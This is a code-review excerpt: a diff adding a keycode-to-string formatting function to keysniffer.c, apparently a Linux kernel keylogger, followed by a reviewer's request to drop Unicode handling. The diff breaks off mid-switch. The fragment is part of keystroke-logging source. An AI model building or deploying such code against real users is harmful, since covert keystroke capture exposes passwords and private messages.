keysniffer.c

```diff
@@ -102,40 +117,69 @@ static struct notifier_block keysniffer_blk = {
 	.notifier_call = keysniffer_cb,
 };
 
+void keycode_to_string(int keycode, int shift_mask, char *buffer, int type)
+{
+  const char *pressed_key;
+  const char *format_type;
+  switch (type) {
+  case US:
+    if (keycode >= 0x1 && keycode <= 0x77) {
+      pressed_key = (shift_mask == 1)
+			? us_keymap[keycode][1]
+			: us_keymap[keycode][0];
+      
+      snprintf(buffer, MAX_ENC_LEN, "%s %x", pressed_key, shift_mask);
+    }
+    break;
+  case HEX:
+    format_type = "%x %x";
+    break;
+  case DEC:
+    format_type = "%d %d";
+    break;
+  case OCT:
+    format_type = "%o %o";
+    break;
+  case UNI:
```

Comment:
As of now it is same as HEX and probably we need to handle Unicode differently. Please remove.